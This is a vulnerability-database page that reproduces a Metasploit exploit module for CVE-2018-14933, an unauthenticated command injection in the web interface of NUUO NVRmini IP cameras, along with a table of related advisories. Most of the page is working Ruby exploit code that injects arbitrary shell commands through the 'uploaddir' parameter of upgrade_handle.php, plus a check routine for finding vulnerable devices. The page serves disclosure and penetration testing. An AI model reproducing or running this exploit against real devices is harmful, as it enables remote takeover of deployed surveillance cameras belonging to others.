NUUO NVRmini upgrade_handle.php Remote Command Execution vulnerability in web application of NUUO NVRmini IP camera, triggered by writeuploaddir command in upgrade_handle.php file
Reporter | Title | Published | Views | Family All 12 |
---|---|---|---|---|
![]() | NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) | 11 Feb 201900:00 | – | exploitdb |
![]() | Command injection | 4 Aug 201819:29 | – | prion |
![]() | CVE-2018-14933 | 4 Aug 201819:29 | – | cve |
![]() | CVE-2018-14933 | 4 Aug 201819:00 | – | cvelist |
![]() | NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit | 7 Feb 201900:00 | – | zdt |
![]() | CVE-2018-14933 | 4 Aug 201800:00 | – | attackerkb |
![]() | CVE-2018-14933 | 4 Aug 201819:00 | – | vulnrichment |
![]() | NUUO NVRmini upgrade_handle.php Remote Command Execution | 6 Dec 201802:51 | – | metasploit |
![]() | CVE-2018-14933 | 4 Aug 201819:29 | – | nvd |
![]() | NUUO NVRmini Devices OS Command Injection Vulnerability | 18 Dec 202400:00 | – | cisa_kev |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
'Description' => %q{
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur', # @berkdusunur
'numan turle' # @numanturle
],
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
}}
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ /upload_tmp_dir/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';"+cmd+";'"
}}
)
unless res
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end
end
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo